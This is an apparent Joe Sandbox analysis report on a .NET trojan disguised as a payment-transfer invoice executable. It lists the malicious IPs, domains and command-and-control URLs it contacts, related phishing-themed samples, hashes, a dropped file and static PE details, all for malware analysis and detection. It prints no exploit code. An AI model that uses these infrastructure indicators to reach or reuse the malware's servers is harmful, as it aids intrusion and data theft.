http://www.stanchilo.com/blr/www.yoshiyama-potager.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jaemagreci.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carbeloy.com/blr/www.prodhealth.site	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sweetpopntreatz.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kanaai.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.long9000.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.olgadalila.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jaemagreci.com/blr/www.sweetpopntreatz.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stanchilo.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
210.152.86.132	unknown	Japan	4694	IDCFIDCFrontierIncJP	true
198.52.105.123	unknown	United States	35916	MULTA-ASN1US	true
50.116.112.43	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
176.74.27.137	unknown	United Kingdom	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
35.246.6.109	unknown	United States	15169	GOOGLEUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
185.199.108.153	unknown	Netherlands	54113	FASTLYUS	true
164.155.144.220	unknown	South Africa	26484	IKGUL-26484US	true
198.27.88.111	unknown	Canada	16276	OVHFR	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356535
Start date:	23.02.2021
Start time:	09:45:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@9/9
EGA Information:	Failed
HDC Information:	Successful, ratio: 65.3% (good quality ratio 60%) Quality average: 71.9% Quality standard deviation: 31.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 79 Number of non-executed functions: 148
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 92.122.145.220, 168.61.161.212, 184.30.20.56, 51.104.139.180, 104.42.151.234, 8.248.139.254, 8.248.131.254, 67.27.157.254, 67.27.157.126, 8.248.147.254, 20.54.26.129, 51.104.144.132, 92.122.213.247, 92.122.213.194, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:46:53	API Interceptor	1x Sleep call for process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.246.6.109	Order_20180218001.exe	Get hash	malicious	Browse	www.pamsinteriors.com/seon/?EJBpf8l=BeyjuOpWFnXPmJwCXss3Kf1c/WkomheBvhalLCEmx4oBhDIsdeYLlupEzXnVn3Elg/0a&kDKHiZ=QFNTw2k
	ORDER LIST.xlsx	Get hash	malicious	Browse	www.equiposddl.com/4qdc/?jpaha=seo4KtASU38iE1JxvFjoxqkgDldoxUIk7lgrfGyblEtLt+g6uaUe1PngqhTXQae7QGmK3w==&3fz=fxopBn3xezt4N4a0
	PO_210222.exe	Get hash	malicious	Browse	www.deepdewood.com/dka/?9rYD4D2P=8Eq/i2VOsbL+cvGSr7jtksOkLx2JSoJy2W2Vokw4XdtvBNdBMtYC7BHfOEJyNL5XOcwi&4h=vTxdADNprBU8ur
	c4p1vG05Z8.exe	Get hash	malicious	Browse	www.cpnpproductions.com/ivay/?Lh0l=ZTdp62D8T&oPnpM4=vFzBmzYkSE6NJX5Oi9qDw7LP1Ie3GejevhUpCGfEyuF65umwf1lNU0clWPDg340Y/N7A
	DHL Shipment Notification 7465649870.pdf.exe	Get hash	malicious	Browse	www.diamondmobiledetailingmo.com/cna8/?kRjH3=D+j2eq9KshChsJfpYDP3dQ9JuFiLgHAjcH9HGbD94qE8IOb1eA4vp6C2dFUUzy2K5Yw6&0pn=WHuxqns0PJ
	PO copy.pdf.exe	Get hash	malicious	Browse	www.420cardsaz.com/mnf/?LZQd=c2FGkgrIiHx6A+YpbujIX/pRBzHucA6uVD2Iv2lwjcDMA3YdIOl90NbZkzPWKwdpkhTknLLKkw==&t6Ah=nvyxGvvP2N
	swift copy pdf.exe	Get hash	malicious	Browse	www.tryangel.store/bft/?_XALWr=jpmZLTSyBz2jdeueRsJVQUmFJk6s6P71pSFOa9DJ8TNzBfJyqx0h1w7Hy/WvHYDE5ViT&qL3=gdnLM6Jh-D
	Shipping Document PL&BL Draft (1).exe	Get hash	malicious	Browse	www.simsprotectionagency.com/h3qo/?t81X=MvZTWvl&CXaDp=fazjW/7YGCwLRHgRC8KmkP4D5qa6jsntndFx6UhabFksSDw+qabl0OCgPeILzj01MKkl
	VgO6Tbd7Rx.exe	Get hash	malicious	Browse	www.inventorengenharia.com/rgc/
	PO-3170012466.exe	Get hash	malicious	Browse	www.belaronconsulting.com/bbk4/?tXi0=MXbP9&h0DhlHu=+EJRPCvoSUIWohgRtjoT+h+aJKJwz5L2awFUgvDh2tnrIXiNEBO46ihyAAukMj+gwlvj
	Docs.exe	Get hash	malicious	Browse	www.jobjori.com/mph/?2d8=uwes4NAAGJvbvTNDrnMSQtTrpf+STMgR9GkF363pIG/8747PqaoTfG32WzLUsEUtFvfI&BXnXAP=YrhH0RRxT8EL1Dl0
	evc421551.exe	Get hash	malicious	Browse	www.germbusterfl.com/yce/?EDKHEJ4=YvBIwtBNBxVWDZ3mSpdVPoUVjRg4HWVmbSak5PPFjoPFoBviop4cOcqLl6Bc6yfYKIGR&FhL=E2M4YLC06Jl
	3434355455453456789998765.exe	Get hash	malicious	Browse	www.fullspeedautomation.com/mlc/?YBZpb4BH=cKajpmj9ZvLEOZObpTfg1vSv7WANvvvZPHvLzMejPL5eBn3vSNfBC5rt5/2jiF+IxeM5&op=3f5H00mHa
	ships documents.xlsx	Get hash	malicious	Browse	www.enlightenedsoil.com/gqx2/?Czud=Dpp83ZapOz0DiPO&-Z7tZ=cjip6uuI9bZoUAnV+V+JPH7D0kYGWUsT6+5UMJSQ9+x3pL2tU/1BL1F+whUGJDO+/8leww==
	NsNu725j8o.exe	Get hash	malicious	Browse	www.thepoetrictedstudio.com/bw82/?qFN4JPfH=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&8p4=fjlP_N-pFZH4xV
	ki7710921.exe	Get hash	malicious	Browse	www.lukebaileydesigns.com/yce/?_FNl7h=BJjaWCSLcmhpwMCAbMgCEpA4KPsKmpI27R00KPA/4hm7M2Dmte16C6Vr3UX3AsCkXC07&qL3=g8nP-lQxEti
	YK5tmqQ18z.exe	Get hash	malicious	Browse	www.oilspilladjustersettlement.com/i032/
	lbqFKoALqe.exe	Get hash	malicious	Browse	www.1819apparel.com/csv8/?8pHXLLhp=XtNGIsK9NyfrmSyC60HBpItz0Umgq62yD1Tk73refEWRTM8pCZ2m1g8hKfyJT1do49NQ&hbs=CnehJPdp6XLP_rwP
	6tivtkKtQx.exe	Get hash	malicious	Browse	www.kindredkitchencatering.com/c8so/?BZL0RN=nQgjEQkVGYPM5UKeXNK2AnUvs9ry6NBQS/Ek/mciAV4zwBvL6PrZKUQFTVM5+2/gn+KNxiHJIQ==&3fPHK=w8O8gTXxNJq
	bgJPIZIYby.exe	Get hash	malicious	Browse	www.thepoetrictedstudio.com/bw82/?GFND=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHJa2sgxgQfnt&Rlj=YVIX8Hyx
34.102.136.180	lpdKSOB78u.exe	Get hash	malicious	Browse	www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha
	vBugmobiJh.exe	Get hash	malicious	Browse	www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src
	NewOrder.xlsm	Get hash	malicious	Browse	www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
	Order_20180218001.exe	Get hash	malicious	Browse	www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
	ORDER LIST.xlsx	Get hash	malicious	Browse	www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0
	PO_210222.exe	Get hash	malicious	Browse	www.kspindustries.com/dka/?9rYD4D2P=9WUKE20VMOTsgTPOGG+gM7wMKgTDQQYKjBu36Jx5uNlLi85Jvnz4VQqFTS3DYsDMhKcM&4h=vTxdADNprBU8ur
	Order83930.exe	Get hash	malicious	Browse	www.worksmade.com/pkfa/?kRm0q=AeLHm4krJ5cZleWXJ7DbkRDB3iMf+mbqkQIEvPdjRXBov8eOMTfw1ykaYqt0P2yYW1wd&P0D=AdpLplk
	DHL eInvoice_Pdf.exe	Get hash	malicious	Browse	www.lovethybodi.com/dll/?Ezrt7H=XrITfbQx&rJET96=VZxax5Ji0ayI+hrvRc8xbN6ADZocsLe3YiHwLknRP/O6fJJXAg3ZXgaLGnTQhcDUXCIi
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	www.sioosi.com/idir/?jFNhC=BAdMNhCaU+7u9XJaCO3iV4C5aA0TCLj07dpBj0L8TrCXQaq7x7/wZRF1tJRJ0mfI3EQomiZFcg==&PlHT0=_6g89p5H3xehg
	rad875FE.tmp.exe	Get hash	malicious	Browse	fdmail85.club/serverstat315/
	SecuriteInfo.com.Trojan.Inject4.6572.17143.exe	Get hash	malicious	Browse	www.buyers-connection.com/mt6e/?T8e0dp=hLmMffsGgwjrW5RZdYCH6mddSm2W9hJJfHEwGoyKmHJo5/xZlUyZeqeg++L426DpjyYm&Fx=3fdx_dt
	DHL Document. PDF.exe	Get hash	malicious	Browse	www.thebrowbandit.info/d8ak/?Szr0s4=zH7+TMUEa66ds4LUG5QkV+A8HFZNfwJlYCtch+3uZ/cbqgmlMO3qxYa4o/rgt+cFNwefcp2wvw==&QL3=uTyTqJdh5XE07
	eInvoice.exe	Get hash	malicious	Browse	www.cyberxchange.net/dll/?alI=J6AlYtFHR6r&DxlLi=O16Cpvehw381JgOcsiBVvt6SNBXVOB+15MfeRQ6rIhocO090ZFQOuEsCZWtNgYTmelCy
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	www.beasley.digital/gypo/?UrjPuprX=M7Hk14MLzXe1S9acHT7ZsieFPBYG9bGpGcbZ4ICPUuDVYKBFzTViR4JE6d+ne5phLrjWAg==&nnLx=UBZp3XKPefjxdB
	Outstanding Invoices.pdf.exe	Get hash	malicious	Browse	www.arescsg.com/ocq1/?Bl=lHLLrF4h72F&ITrHi2v=QNjT++wY9a5zCVAjoE7Ie93o6MHPk5lGE/qlj9tP3aNbcRLbl33t+j0E2POpmVTB9EfC
	PDF.exe	Get hash	malicious	Browse	www.sevendeepsleep.com/ujg4/?Ktz4q=vVYHGFhESmr0MhafV2r1epXRiWHZKHpqHzgNJrSdHWrYUNDGZWFgSG6u51EUVnN8n2QK&tTrL=ApdhXrS
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	www.scanourworld.com/nsag/?ixlp=RjpY/w7V4Gns1L0rMkaS4a7cxyPO11vhmKSgl8HqKcRxVLLhONg71u8j186CVYVfR9NOyw==&3f=7nD434
	(G0170-PF3F-20-0260)2T.exe	Get hash	malicious	Browse	www.midnightblueinc.com/2kf/?-ZotnB1=PuGWiF25ErpS8LxGcVT732T32YJ8ljB4Nen33bTYqCA1w1k4pKKXZiLEs+9S++zZpoCcFtK2bw==&2d=oneDfP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
td-balancer-euw2-6-109.wixdns.net	Order_20180218001.exe	Get hash	malicious	Browse	35.246.6.109
	ORDER LIST.xlsx	Get hash	malicious	Browse	35.246.6.109
	PO_210222.exe	Get hash	malicious	Browse	35.246.6.109
	SecuriteInfo.com.Trojan.Inject4.6572.17143.exe	Get hash	malicious	Browse	35.246.6.109
	c4p1vG05Z8.exe	Get hash	malicious	Browse	35.246.6.109
	DHL Shipment Notification 7465649870.pdf.exe	Get hash	malicious	Browse	35.246.6.109
	DHL Shipment Notification 7465649870.doc	Get hash	malicious	Browse	35.246.6.109
	PO copy.pdf.exe	Get hash	malicious	Browse	35.246.6.109
	swift copy pdf.exe	Get hash	malicious	Browse	35.246.6.109
	Shipping Document PL&BL Draft (1).exe	Get hash	malicious	Browse	35.246.6.109
	VgO6Tbd7Rx.exe	Get hash	malicious	Browse	35.246.6.109
	PO-3170012466.exe	Get hash	malicious	Browse	35.246.6.109
	Docs.exe	Get hash	malicious	Browse	35.246.6.109
	evc421551.exe	Get hash	malicious	Browse	35.246.6.109
	3434355455453456789998765.exe	Get hash	malicious	Browse	35.246.6.109
	ships documents.xlsx	Get hash	malicious	Browse	35.246.6.109
	NsNu725j8o.exe	Get hash	malicious	Browse	35.246.6.109
	ki7710921.exe	Get hash	malicious	Browse	35.246.6.109
	YK5tmqQ18z.exe	Get hash	malicious	Browse	35.246.6.109
	lbqFKoALqe.exe	Get hash	malicious	Browse	35.246.6.109

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MULTA-ASN1US	RdLlHaxEKP.exe	Get hash	malicious	Browse	173.82.229.126
	CMahQwuvAE.exe	Get hash	malicious	Browse	66.152.187.17
	Vghj5O8TF2rYH85.exe	Get hash	malicious	Browse	198.211.22.68
	hkcmd.exe	Get hash	malicious	Browse	66.152.187.17
	DNSmonitor.x86	Get hash	malicious	Browse	198.211.10.10
	Agreement.xlsx	Get hash	malicious	Browse	66.152.187.17
	hmH9ZhBQFD.exe	Get hash	malicious	Browse	66.152.187.17
	Signatures Required 21-01-2021.xlsx	Get hash	malicious	Browse	66.152.187.17
	fl3TkfT33S.exe	Get hash	malicious	Browse	66.152.187.17
	2021 DOCS.xlsx	Get hash	malicious	Browse	66.152.187.17
	RE SHIPPING DOCS MNL 1X20GP+1X40HC ETD27012021pdf.exe	Get hash	malicious	Browse	72.44.77.80
	xwE6WlNHu1.exe	Get hash	malicious	Browse	66.152.187.17
	PO_JAN907#092941_BARYSLpdf.exe	Get hash	malicious	Browse	72.44.77.80
	TIGW1Ow1O6.exe	Get hash	malicious	Browse	64.69.43.237
	F9FX9EoKDL.exe	Get hash	malicious	Browse	66.152.187.17
	NEW ORDER 15DEC.xlsx	Get hash	malicious	Browse	66.152.187.17
	Purchase Order#12202011.exe	Get hash	malicious	Browse	96.45.164.251
	ShippingDoc12-08.exe	Get hash	malicious	Browse	66.152.187.17
	at3nJkOFqF.exe	Get hash	malicious	Browse	66.152.187.17
	Shipment Document BL,INV And Packing List Attached.exe	Get hash	malicious	Browse	198.74.106.231
IDCFIDCFrontierIncJP	wEcncyxrEe	Get hash	malicious	Browse	202.230.13.241
	Xy4f5rcxOm.dll	Get hash	malicious	Browse	164.46.102.68
	990109.exe	Get hash	malicious	Browse	210.140.73.39
	https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343	Get hash	malicious	Browse	202.241.208.4
	http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175	Get hash	malicious	Browse	202.241.208.56
	SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exe	Get hash	malicious	Browse	210.152.124.48
	SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exe	Get hash	malicious	Browse	210.152.124.48
	qkN4OZWFG6.exe	Get hash	malicious	Browse	202.230.201.31
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	210.140.73.39
	https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.html	Get hash	malicious	Browse	210.129.190.174
	3yhnaDfaxn.exe	Get hash	malicious	Browse	210.140.73.39
	https://nursing-theory.org/theories-and-models/holistic-nursing.php	Get hash	malicious	Browse	202.241.208.55
	http://lapolicegear.com/?msclkid=bff2b1b585fd11812fcaee88d4e2dc4d&utm_source=bing&utm_medium=cpc&utm_campaign=ECI%20-%20LA%20Police%20Gear%20-%20Branded&utm_term=lapg%20gear&utm_content=LAPG%20Branded	Get hash	malicious	Browse	202.241.208.100
	http://www.fujikura-control.com	Get hash	malicious	Browse	210.140.44.93
	http://scamcharge.com	Get hash	malicious	Browse	202.241.208.55

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log Download File
Process:	C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.417043661042723
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
File size:	716288
MD5:	5f1c9c4a7bc24c3d39a5a3834ba7bb8e
SHA1:	0e9a21a75675c636438f50d90bb5f7ec9a689275
SHA256:	5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
SHA512:	a85b3076ee72e71532e60d84e6827b6c83ddaa2b1f0b287fac373eff495f67600a4e8d47459c6253538f0d9d770c004f41833e75d630d12047442ed3a9033894
SSDEEP:	12288:IQ4DA80ZwvXdU9aLBdf3INYI1r1VJjRXRePHp:8DUZ22ODklZRYPHp
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F4`..............P......H........... ........@.. .......................`............@................................

File Icon


Icon Hash:	020b05151c020900

Static PE Info

General
Entrypoint:	0x47c38a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60344694 [Tue Feb 23 00:04:36 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c338	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0x344e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7a390	0x7a400	False	0.763266471754	data	7.45974448722	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
